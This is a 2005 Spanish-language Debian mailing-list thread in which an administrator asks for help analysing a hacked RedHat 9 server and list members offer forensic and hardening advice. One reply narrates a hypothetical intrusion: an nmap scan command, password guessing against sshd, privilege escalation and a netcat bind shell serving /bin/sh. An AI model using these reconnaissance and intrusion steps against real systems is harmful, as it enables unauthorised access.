Re: Opiniones ?... Seguridad/hacking-.

2005-06-24 Por tema Ricardo Frydman 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
> crimen contra un servidor que fue hackeado :-(
Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?

> en primera instancia puedo creer que el ataque fue hecho via web ya que
> la maquina en si.. no tiene contacto fisico alguno con el exterior  a
> escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
> chroot).

Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

Los paquetes instalados eran todos de repositorios oficiales?

> el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
> bases de datos ssh y el equipo se colgo..
> 
> fue una gran sorpresa al darme cuenta que cuando inicie la makina en
> modo rescate  /var estaba vacio practicamente piendo en un rm
> -rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
> atake.. pero buscando en /tmp  encontre algo interezante un archivo
> llamado _conex.pl_
> 
> cuyo contenido muestro aqui.
> > 

[Codigo perl de una puerta trasera]

Alguna referencia:
http://www.experts-exchange.com/Security/Linux_Security/Q_21291502.html
Lo que entiendo de alli es que mediante netcat se conecta al 9000...para
explotar alguan vulnerabilidad.
Lo que no me queda claro es si para acceder a tu host explotó esa vuln o
lo hizo desde dentro...en tal caso...como entro?

> y me dije que diablos !!!...
> entonces.. me decidi a preguntar a la lista por si alguien mas o menos
> entiende este script o podria decir como funciona.. para tomar
> precauciones en la proxima reinstalacion del servidor. y asi protejer
> mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
> mas de seguridad que es tan importante.
> Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
> informe claro y Tecnico de lo sucedido aqui.
> 
> Atentamente
> Nelson Lopez.
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCvBxykw12RhFuGy4RAhWsAJ4oVPdXzb/nDLVhs+twwV/+u19hZACggPc3
04Qp5nKs9XckcvIKIiAOEiI=
=BCVH
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-17 Por tema Faro 
El vie, 10-06-2005 a las 12:15 -0400, Nelson escribió:

> en primera instancia puedo creer que el ataque fue hecho via web ya que
> la maquina en si.. no tiene contacto fisico alguno con el exterior  a
> escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
> chroot).

Lo más probable es que usaran alguna vulnerabilidad de alguna de tus
aplicaciones web (con un software tan viejo como el que usas, sería muy
fácil si no estaba parcheado). A partir de ahí puede ejecutar cualquier
cosa, o bien con un SQLInjection o aprovechando otra entrada de texto no
comprobada de un "form". Por ejemplo pudo haber usado wget o lynx para
bajar el backdoor que adjuntas. y ejecutarlo.

Te da igual el cortafuegos porque en todo momento está usando el puerto
80 que tienes que tener abierto para dar servicio web. Lo que puedes
hacer para el futuro es capar el 80 de salida y los de ftp para que no
puedan hacer lo que describo. Borar wget y lynx también es una buena
idea. Así lo tengo yo salvo para la máquina de debian para el apt. Esto
es válido si la máquina no se va a utilizar para navegar (en un servidor
debe valer).

El backdoor te abre una consola privilegiada en un puerto arbitrario, y
a partir de ahí ya puede hacer lo que quiera (como borrar el /var).
Quizá un cortafuegos con todo cerrado por defecto te hubiera salvado.

El ataque no tiene mayor complicación, tiene la pinta de ser un
script-kiddy (o como se escriba) no un cracker.

Suerte para la próxima.


-- 
faro arroba escomposlinux punto org
http://antares.escomposlinux.org
http://wiki.escomposlinux.org
http://libertonia.escomposlinux.org
Debian GNU/Linux - Usuario Linux #162541


signature.asc
Description: This is a digitally signed message part

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Simón Pena 
Espero no haber llegado demasiado tarde :(. Si quieres saber qué
ocurrió en tu servidor, y todavía no reinstalaste nada, plantéate
hacer un análisis forense. Hay herramientas, tipo tct (The coroner's
toolkit) o autopsy, creo que era otra, que te permitirán "desborrar"
tu disco duro, con lo que podrías recuperar los archivos de log.
También podrías analizar binarios, comprobar si crearon nuevos
usuarios para ver si quedó algo en sus directorios home, podrías
buscar directorios ocultos en tu sistema donde pudiesen haber
descargado los archivos que usaron como exploits...
Hubo una especie de concurso hace poco, os paso el link [1], donde
precisamente se ponía a disposición del público una serie de imágenes
de disco de un "honey pot" que cumplió su objetivo, esto es, fue
atacado. El concurso proponía intentar descubrir todo lo posible
acerca del asalto. Bueno, os dejo que voy a cenar :)

[1] http://www.seguridad.unam.mx/eventos/reto/

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema navickator shadow 
Hola.

Bueno, observando las versiones de software de tu servidor
podemos hacernos una idea de que el intruso no tubo mayores
problemas para comprometer tu servidor.

Como lo comentaron antes lo que hice fue narrar una historia
sencilla, que viéndolo bien de pronto no fue así :) :)

Bueno, ahora que te pusieron atrabajar y tienes que montar otra vez 
el sistema intenta hacerlo bien desde el inicio.
Primero que todo debes preguntarte que servicios quieres ofrecer 
en tu servidor y porque?
Sera realmente necesario el ftp? 
cuantos usuarios tendrá el sistema?
por que no implementar un ftp con socket seguro?

es necesario el http?
que módulos debe tener instalados?
utiliza algún lenguaje del lado del servidor?
utilizas alguna base de datos?

dependiendo de que servicios quieres montar, haces un particionamiento
de disco adecuado, auque no lo creas esto te permite asegurar de 
una manera grandiosa tu servidor, debian ofrece al momento de la instalación
una manera fantástica para particionar y colocar quotas de grupo de usuario
programas con suid, ejecución de programas. un montón de cosas
por ejemplo podrías crear una partición para /tmp la cual no permita ejecución 
de guiones ni de nada.
luego de esto debes pensar en cual es el demonio adecuado y como centralizar 
la autenticación de los usuarios.
No instales programas que no utilizaras en un servidor: juegos, suite de ofimática
soporte para algunos lenguajes, compiladores y demás... esto puede ser el quiebre
de tu sistema en algún momento.

Si lees el manual de seguridad de DEBIAN, encontraras varias formas
de fortalecer tu sistema.

Bueno, cambiando de tema te voy a dar un consejo, si me lo permites claro esta!

NUNCA te confíes de un firewall, en la mayoría de veces no sirve para nada.
Muchos administradores se confían en sus reglas de firewall y dejan de lado las aplicaciones
de sus sistema.
ejemplo:conocí un sistema del gobierno de un lejano país que tenia todas las reglas de seguridad 
que tu quieras... hahaha que patético, era tan facil acceder a sus datos que pu. El problema
un error en la programación, errores de SQLinjection XSS

Esto lo digo para que lo pienses, preocupate por tus desarrollos y de esta forma
tu sistema sera más seguro.

Bueno, para terminar, siempre mira tus logs y guardarlos en cintas o algo similar.

Saludos

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Danny Rojas Barría 

Ricardo Frydman wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
 


El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:

   


Hola.

Bueno, primero que todo mi sentido pesame por tu servidor
espero que renasca de las cenizas y sea mejor que antes :)

ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
en tu servidor.

el atacante lo primero que realizo fue un scaneo de puertos
desde alguna maquina remota que tal vez ya estaba comprometida
o que tal vez era su maquina real o un proxy... no sabemos
miro los puertos

nmap -sS -sV -O -v -P0 tuip

con esto consiguio pasarte por encima de tu firewall si lo tenias y
obtener 
una lista de los puertos abiertos de tu servidor junto con

las versiones de los demonios que ellos corrian.

ya teniendo esto y observando que tenias el ftp y sshd abiertos 
la tarea que le sigue es buscar en la pagina en internet o en google 
buscando correos electronicos por ejemplo [EMAIL PROTECTED]
...bueno, teniendo estas cuentas y siendo obtimistas de que 
en tu servidor creaste usuarios reales en el sistema y no

en una base de datos y que a ellos le colocaste en la shell /bin/bash
en vez de de /bin/false... el atacante inicia en la busqueda de un
exploit
para tus demonios, si no lo encuentra entonces iniciara un 
ataque de diccionario sobre tus servicios, creo que inicio por
el sshd... suponiendo que despues de varias horas de intentar 
obtuvo una entrada a tu sistema por medio de un

usuariohttp://www.google.com.co/
con una muy mala contraseña... luego el atacante ya tiene una shell
e inicia en la busqueda de errores internos en busqueda de una 
escalada de privilegios, puede buscar programas con SUID o detenerse

y observar en securityfocus.com cientos de errores de seguridad
que puede contener tu sistema.
Suponiendo de despues de varias horas escaneando tu sistema por dentro
y teniendo un exploit local consiguio acceso al root... despues de
este punto
tu maquina ya esta perdida y no hace falta imaginarnos que podria
hacer
con este poder!!!

El script en perl que nombras es muy sencillo.
el recive dos parametros que son los siguiente el nombre del host y su
ip
envia una peticion a dicho puerto de el nombre de la maquina y una
shell
claro que este script no funciona para nada si antes inicialisaste un
puerto
con shell... me explico: esto se haria por ejemplo con netcat, este
permite
crear un demonio que escuche determonado puerto y que cuando el se
conecte
le sirva un determinado archivo, ejemplo /bin/sh

entonces el atacante ejecuta el guion en perl para conectarse a otra
maquina objetivo
conclusion: utiliso tu maquina como puente para atacar otras redes.
claro que podria suponer que es muy novato o un scriptkid ya que
destruyo
tu sistema... yo permaneceria con una cuenta privilegiada en tu
sistema :)

Bueno, creo que eso es todo por el momento... si seme ocurre algomas
estare escribiendo

Saludos.
 




uf
pero si casi parece una conspiracion contra el presidente :o !!!..
   


Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando
reconstruir lo sucedido".puede no ser lo que paso (en realidad no
creo que haya sido asi XD)

 


esos parametros de nmap nos los conocia y me parecieron bastante
interesantes y asombrosos.. mas bien. preocupante diria yo..
   


Depende como configures tu firewall...

 


que hacer ante un caso como este ?... de que forma se podria prevenir
este tipo de scaneos en un sistema ?...
   


Configurando adecuadamente tu firewall para prevenirte contra ese tipo
de escaneos + otras herramientas de deteccion, aunque dudo que lo
necesites, si me lo preguntas...

 


que preocupante poder ver este tipo de accion. y ver que no basta con
las posibles "soluciones de seguridad" que se implementen siempre habra
algo que logre saltar un sistema =/...
   


Bueno, es cuestion de reducir posibilidades...como te conteste recien en
otro correo, creo que dejaste las cosas demasiado al azar por decirlo de
algun modo...

 


salu2 y en este mismo momento me dispongo a reeleer el manual de
iptables para mejorar el firewall de aquella empresa...
   


Puedes leer tambien:
http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html

 


consejos ?..
   


Ahi fue uno...
Otro: olvida la paranoia, que te sirva para el futuro

 

   




- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdxZkw12RhFuGy4RAu3lAJoC1v36CjU63uwj6Vq8VkacmMHkigCfaZCd
9M9W04rQ/QSkeAkNjw1uvPA=
=vKmw
-END PGP SIGNATURE-


 


No seria malo que el sistema te enviara los logs al correo

Saludos compatriota...

Danny R.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Nelson 
El vie, 10-06-2005 a las 15:38 -0300, Ricardo Frydman escribió:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Nelson wrote:
> > Muchas gracias por los consejos y lo de la paranoia quisas si entre un
> > poco en panico.. pero como dices la guardare para el futuro.. ahora me
> > dedicare a robustecer el firewall :-)...
> Que distribucion piensas instalar? ;)

Por Supuesto que Debian =)..

en realidad yo soy un debianero hace mucho tiempo.. pero ese servidor no
es mio..

solo estoy ayudando =).. 

> 
> > 
> > muchas gracias..
> > 
> > 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Ricardo Frydman 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> Muchas gracias por los consejos y lo de la paranoia quisas si entre un
> poco en panico.. pero como dices la guardare para el futuro.. ahora me
> dedicare a robustecer el firewall :-)...
Que distribucion piensas instalar? ;)

> 
> muchas gracias..
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqd4Ukw12RhFuGy4RAhpLAKCAO7Nhbu9CTIuNauS4JKHMNMUCYwCeMjD3
Fnw6RMNwv2TdiVruzwL92UM=
=0jw/
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Nelson 
El vie, 10-06-2005 a las 15:30 -0300, Ricardo Frydman escribió:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Nelson wrote:
> > El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:
> > 
> >>Hola.
> >>
> >>Bueno, primero que todo mi sentido pesame por tu servidor
> >>espero que renasca de las cenizas y sea mejor que antes :)
> >>
> >>ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
> >>en tu servidor.
> >>
> >>el atacante lo primero que realizo fue un scaneo de puertos
> >>desde alguna maquina remota que tal vez ya estaba comprometida
> >>o que tal vez era su maquina real o un proxy... no sabemos
> >>miro los puertos
> >>
> >>nmap -sS -sV -O -v -P0 tuip
> >>
> >>con esto consiguio pasarte por encima de tu firewall si lo tenias y
> >>obtener 
> >>una lista de los puertos abiertos de tu servidor junto con
> >>las versiones de los demonios que ellos corrian.
> >>
> >>ya teniendo esto y observando que tenias el ftp y sshd abiertos 
> >>la tarea que le sigue es buscar en la pagina en internet o en google 
> >>buscando correos electronicos por ejemplo [EMAIL PROTECTED]
> >>...bueno, teniendo estas cuentas y siendo obtimistas de que 
> >>en tu servidor creaste usuarios reales en el sistema y no
> >>en una base de datos y que a ellos le colocaste en la shell /bin/bash
> >>en vez de de /bin/false... el atacante inicia en la busqueda de un
> >>exploit
> >>para tus demonios, si no lo encuentra entonces iniciara un 
> >>ataque de diccionario sobre tus servicios, creo que inicio por
> >>el sshd... suponiendo que despues de varias horas de intentar 
> >>obtuvo una entrada a tu sistema por medio de un
> >>usuariohttp://www.google.com.co/
> >>con una muy mala contraseña... luego el atacante ya tiene una shell
> >>e inicia en la busqueda de errores internos en busqueda de una 
> >>escalada de privilegios, puede buscar programas con SUID o detenerse
> >>y observar en securityfocus.com cientos de errores de seguridad
> >>que puede contener tu sistema.
> >>Suponiendo de despues de varias horas escaneando tu sistema por dentro
> >>y teniendo un exploit local consiguio acceso al root... despues de
> >>este punto
> >>tu maquina ya esta perdida y no hace falta imaginarnos que podria
> >>hacer
> >>con este poder!!!
> >>
> >>El script en perl que nombras es muy sencillo.
> >>el recive dos parametros que son los siguiente el nombre del host y su
> >>ip
> >>envia una peticion a dicho puerto de el nombre de la maquina y una
> >>shell
> >>claro que este script no funciona para nada si antes inicialisaste un
> >>puerto
> >>con shell... me explico: esto se haria por ejemplo con netcat, este
> >>permite
> >>crear un demonio que escuche determonado puerto y que cuando el se
> >>conecte
> >>le sirva un determinado archivo, ejemplo /bin/sh
> >>
> >>entonces el atacante ejecuta el guion en perl para conectarse a otra
> >>maquina objetivo
> >>conclusion: utiliso tu maquina como puente para atacar otras redes.
> >>claro que podria suponer que es muy novato o un scriptkid ya que
> >>destruyo
> >>tu sistema... yo permaneceria con una cuenta privilegiada en tu
> >>sistema :)
> >>
> >>Bueno, creo que eso es todo por el momento... si seme ocurre algomas
> >>estare escribiendo
> >>
> >>Saludos.
> > 
> > 
> > 
> > 
> > uf
> > pero si casi parece una conspiracion contra el presidente :o !!!..
> Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando
> reconstruir lo sucedido".puede no ser lo que paso (en realidad no
> creo que haya sido asi XD)
> 
> > esos parametros de nmap nos los conocia y me parecieron bastante
> > interesantes y asombrosos.. mas bien. preocupante diria yo..
> Depende como configures tu firewall...
> 
> > que hacer ante un caso como este ?... de que forma se podria prevenir
> > este tipo de scaneos en un sistema ?...
> Configurando adecuadamente tu firewall para prevenirte contra ese tipo
> de escaneos + otras herramientas de deteccion, aunque dudo que lo
> necesites, si me lo preguntas...
> 
> > que preocupante poder ver este tipo de accion. y ver que no basta con
> > las posibles "soluciones de seguridad" que se implementen siempre habra
> > algo que logre saltar un sistema =/...
> Bueno, es cuestion de reducir posibilidades...como te conteste recien en
> otro correo, creo que dejaste las cosas demasiado al azar por decirlo de
> algun modo...
> 
> > salu2 y en este mismo momento me dispongo a reeleer el manual de
> > iptables para mejorar el firewall de aquella empresa...
> Puedes leer tambien:
> http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html
> 
> > consejos ?..
> Ahi fue uno...
> Otro: olvida la paranoia, que te sirva para el futuro
> 



Muchas gracias por los consejos y lo de la paranoia quisas si entre un
poco en panico.. pero como dices la guardare para el futuro.. ahora me
dedicare a robustecer el firewall :-)...

muchas gracias..


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL P

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Ricardo Frydman 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:
> 
>>Hola.
>>
>>Bueno, primero que todo mi sentido pesame por tu servidor
>>espero que renasca de las cenizas y sea mejor que antes :)
>>
>>ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
>>en tu servidor.
>>
>>el atacante lo primero que realizo fue un scaneo de puertos
>>desde alguna maquina remota que tal vez ya estaba comprometida
>>o que tal vez era su maquina real o un proxy... no sabemos
>>miro los puertos
>>
>>nmap -sS -sV -O -v -P0 tuip
>>
>>con esto consiguio pasarte por encima de tu firewall si lo tenias y
>>obtener 
>>una lista de los puertos abiertos de tu servidor junto con
>>las versiones de los demonios que ellos corrian.
>>
>>ya teniendo esto y observando que tenias el ftp y sshd abiertos 
>>la tarea que le sigue es buscar en la pagina en internet o en google 
>>buscando correos electronicos por ejemplo [EMAIL PROTECTED]
>>...bueno, teniendo estas cuentas y siendo obtimistas de que 
>>en tu servidor creaste usuarios reales en el sistema y no
>>en una base de datos y que a ellos le colocaste en la shell /bin/bash
>>en vez de de /bin/false... el atacante inicia en la busqueda de un
>>exploit
>>para tus demonios, si no lo encuentra entonces iniciara un 
>>ataque de diccionario sobre tus servicios, creo que inicio por
>>el sshd... suponiendo que despues de varias horas de intentar 
>>obtuvo una entrada a tu sistema por medio de un
>>usuariohttp://www.google.com.co/
>>con una muy mala contraseña... luego el atacante ya tiene una shell
>>e inicia en la busqueda de errores internos en busqueda de una 
>>escalada de privilegios, puede buscar programas con SUID o detenerse
>>y observar en securityfocus.com cientos de errores de seguridad
>>que puede contener tu sistema.
>>Suponiendo de despues de varias horas escaneando tu sistema por dentro
>>y teniendo un exploit local consiguio acceso al root... despues de
>>este punto
>>tu maquina ya esta perdida y no hace falta imaginarnos que podria
>>hacer
>>con este poder!!!
>>
>>El script en perl que nombras es muy sencillo.
>>el recive dos parametros que son los siguiente el nombre del host y su
>>ip
>>envia una peticion a dicho puerto de el nombre de la maquina y una
>>shell
>>claro que este script no funciona para nada si antes inicialisaste un
>>puerto
>>con shell... me explico: esto se haria por ejemplo con netcat, este
>>permite
>>crear un demonio que escuche determonado puerto y que cuando el se
>>conecte
>>le sirva un determinado archivo, ejemplo /bin/sh
>>
>>entonces el atacante ejecuta el guion en perl para conectarse a otra
>>maquina objetivo
>>conclusion: utiliso tu maquina como puente para atacar otras redes.
>>claro que podria suponer que es muy novato o un scriptkid ya que
>>destruyo
>>tu sistema... yo permaneceria con una cuenta privilegiada en tu
>>sistema :)
>>
>>Bueno, creo que eso es todo por el momento... si seme ocurre algomas
>>estare escribiendo
>>
>>Saludos.
> 
> 
> 
> 
> uf
> pero si casi parece una conspiracion contra el presidente :o !!!..
Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando
reconstruir lo sucedido".puede no ser lo que paso (en realidad no
creo que haya sido asi XD)

> esos parametros de nmap nos los conocia y me parecieron bastante
> interesantes y asombrosos.. mas bien. preocupante diria yo..
Depende como configures tu firewall...

> que hacer ante un caso como este ?... de que forma se podria prevenir
> este tipo de scaneos en un sistema ?...
Configurando adecuadamente tu firewall para prevenirte contra ese tipo
de escaneos + otras herramientas de deteccion, aunque dudo que lo
necesites, si me lo preguntas...

> que preocupante poder ver este tipo de accion. y ver que no basta con
> las posibles "soluciones de seguridad" que se implementen siempre habra
> algo que logre saltar un sistema =/...
Bueno, es cuestion de reducir posibilidades...como te conteste recien en
otro correo, creo que dejaste las cosas demasiado al azar por decirlo de
algun modo...

> salu2 y en este mismo momento me dispongo a reeleer el manual de
> iptables para mejorar el firewall de aquella empresa...
Puedes leer tambien:
http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html

> consejos ?..
Ahi fue uno...
Otro: olvida la paranoia, que te sirva para el futuro

> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdxZkw12RhFuGy4RAu3lAJoC1v36CjU63uwj6Vq8VkacmMHkigCfaZCd
9M9W04rQ/QSkeAkNjw1uvPA=
=vKmw
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Nelson 
El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:
> Hola.
> 
> Bueno, primero que todo mi sentido pesame por tu servidor
> espero que renasca de las cenizas y sea mejor que antes :)
> 
> ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
> en tu servidor.
> 
> el atacante lo primero que realizo fue un scaneo de puertos
> desde alguna maquina remota que tal vez ya estaba comprometida
> o que tal vez era su maquina real o un proxy... no sabemos
> miro los puertos
> 
> nmap -sS -sV -O -v -P0 tuip
> 
> con esto consiguio pasarte por encima de tu firewall si lo tenias y
> obtener 
> una lista de los puertos abiertos de tu servidor junto con
> las versiones de los demonios que ellos corrian.
> 
> ya teniendo esto y observando que tenias el ftp y sshd abiertos 
> la tarea que le sigue es buscar en la pagina en internet o en google 
> buscando correos electronicos por ejemplo [EMAIL PROTECTED]
> ...bueno, teniendo estas cuentas y siendo obtimistas de que 
> en tu servidor creaste usuarios reales en el sistema y no
> en una base de datos y que a ellos le colocaste en la shell /bin/bash
> en vez de de /bin/false... el atacante inicia en la busqueda de un
> exploit
> para tus demonios, si no lo encuentra entonces iniciara un 
> ataque de diccionario sobre tus servicios, creo que inicio por
> el sshd... suponiendo que despues de varias horas de intentar 
> obtuvo una entrada a tu sistema por medio de un
> usuariohttp://www.google.com.co/
> con una muy mala contraseña... luego el atacante ya tiene una shell
> e inicia en la busqueda de errores internos en busqueda de una 
> escalada de privilegios, puede buscar programas con SUID o detenerse
> y observar en securityfocus.com cientos de errores de seguridad
> que puede contener tu sistema.
> Suponiendo de despues de varias horas escaneando tu sistema por dentro
> y teniendo un exploit local consiguio acceso al root... despues de
> este punto
> tu maquina ya esta perdida y no hace falta imaginarnos que podria
> hacer
> con este poder!!!
> 
> El script en perl que nombras es muy sencillo.
> el recive dos parametros que son los siguiente el nombre del host y su
> ip
> envia una peticion a dicho puerto de el nombre de la maquina y una
> shell
> claro que este script no funciona para nada si antes inicialisaste un
> puerto
> con shell... me explico: esto se haria por ejemplo con netcat, este
> permite
> crear un demonio que escuche determonado puerto y que cuando el se
> conecte
> le sirva un determinado archivo, ejemplo /bin/sh
> 
> entonces el atacante ejecuta el guion en perl para conectarse a otra
> maquina objetivo
> conclusion: utiliso tu maquina como puente para atacar otras redes.
> claro que podria suponer que es muy novato o un scriptkid ya que
> destruyo
> tu sistema... yo permaneceria con una cuenta privilegiada en tu
> sistema :)
> 
> Bueno, creo que eso es todo por el momento... si seme ocurre algomas
> estare escribiendo
> 
> Saludos.



uf
pero si casi parece una conspiracion contra el presidente :o !!!..

esos parametros de nmap nos los conocia y me parecieron bastante
interesantes y asombrosos.. mas bien. preocupante diria yo..

que hacer ante un caso como este ?... de que forma se podria prevenir
este tipo de scaneos en un sistema ?...

que preocupante poder ver este tipo de accion. y ver que no basta con
las posibles "soluciones de seguridad" que se implementen siempre habra
algo que logre saltar un sistema =/...

salu2 y en este mismo momento me dispongo a reeleer el manual de
iptables para mejorar el firewall de aquella empresa...

consejos ?..


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Ricardo Frydman 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> El vie, 10-06-2005 a las 13:49 -0300, Ricardo Frydman escribió:
> 
> Nelson wrote:
> 
>>Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
>>crimen contra un servidor que fue hackeado :-(
> 
> Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?
> 
> 
>> Distribucion RedHat 9

Insegura de fábrica. Discontinuada desde hace un año (!)

>> kernel 2.4.20-8

2 Siglos de antiguedad...varios fallos descubiertos, parchado?

>> firewall iptables configuracion basica solo permitia ftp y web
"solo permitia ftp" _solo_ eso ya es mucho...

>> paquetes instalados. la base + los paquetes de apache mysql php y
>> pureftpd oficial compilado.
Actualizado a fecha?.

>> PS: se que esta es una lista debian, pero necesito recaudar datos
>> hacerca del tema. es preocupante lo que sucedio. pido disculpas si
>> molesto a alguien. :-)


En realidad no molestassiempre y cuando ahora le pongas, como Dios
manda, un Debian Sarge y te preocupes un minimo por administrarlo
adecuadamente.
La seguridad no es *solo* instalar un Sistema Operativo que no tenga
(casi) virusConozco servidores Windows infinitamente mas seguros y
mejor administrados que muchos Linux...
*

>>en primera instancia puedo creer que el ataque fue hecho via web ya que
>>la maquina en si.. no tiene contacto fisico alguno con el exterior  a
>>escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
>>chroot).
> 
> Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

>> pure-ftp permite crear usuarios virtuales atados a un grupo existente en
>> la makina sin necesidad de crear el usuario de sistema, solo

https://www.linuxrocket.net/index.cgi?a=MailArchiver&ma=ShowMail&Id=190910


imagino esto al dia
http://sourceforge.net/tracker/?atid=318317&group_id=18317&func=browse

Te puede haber pasado esto:
http://www.linuxforum.com/forums/index.php?showtopic=125174

Como alguien dijo por alli, contraseñas debiles.
Hay muchos flancos por donde puede haber entradocreo que ahora debes
preocuparte por el futuro



>> virtualmente y lo del chroot es que el usuario queda atado netamente a
>> el "home" o directorio que uno establece para su uso al momento de
>> generar el usuario

sé lo que es un chroot..aunque lo estés definiendo de manera
equivocada ;)
http://www.argo.es/~jcea/artic/chroot.htm

> Los paquetes instalados eran todos de repositorios oficiales?
> 
> 
>>el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
>>bases de datos ssh y el equipo se colgo..

que es base de datos ssh?

>>fue una gran sorpresa al darme cuenta que cuando inicie la makina en
>>modo rescate  /var estaba vacio practicamente piendo en un rm
>>-rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
>>atake.. pero buscando en /tmp  encontre algo interezante un archivo
>>llamado _conex.pl_
> 
>>cuyo contenido muestro aqui.
> 
> [Codigo perl de una puerta trasera]
> Lo que entiendo es que te instalaron y ejecutaron un programa para abrir
> una puerta traseracon exito.
> Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o
> lo hizo desde dentro...en tal caso...como entro?
> 
> Saludos
> 
> 
> 
>> eso es lo que me pregunto yo =/..
>> lo mas extraño es.. como llego el exploit ahi. de que forma ya que ni
>> por ssh pudo haber llegado hasta ahi.

Bueno hay otros caminos, de eso ahora no te quedan dudas :P

> 
>> la maquina esta detras de un router con ip privada solo acediendo a el
>> con redireccion de puertos.
> 
> 
> 
>>y me dije que diablos !!!...
>>entonces.. me decidi a preguntar a la lista por si alguien mas o menos
>>entiende este script o podria decir como funciona.. para tomar
>>precauciones en la proxima reinstalacion del servidor. y asi protejer
>>mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
>>mas de seguridad que es tan importante.
>>Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
>>informe claro y Tecnico de lo sucedido aqui.
> 
>>Atentamente
>>Nelson Lopez.
> 
> 
> 
> 
> --
> Ricardo A.Frydman
> Consultor en Tecnología Open Source
> Administrador de Sistemas
> http://www.eureka-linux.com.ar
> 
> 

- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdbjkw12RhFuGy4RAuGfAJ9r5oFrNPjs2wVtR//uN18u9+dg3ACcC0Je
HVevjeNkW7qoF7ZH8r7b7pM=
=DC9G
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Nelson 
El vie, 10-06-2005 a las 13:49 -0300, Ricardo Frydman escribió:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Nelson wrote:
> > Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
> > crimen contra un servidor que fue hackeado :-(
